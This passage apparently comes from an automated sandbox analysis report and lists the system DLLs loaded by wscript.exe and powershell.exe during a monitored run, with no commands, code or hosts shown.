                        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
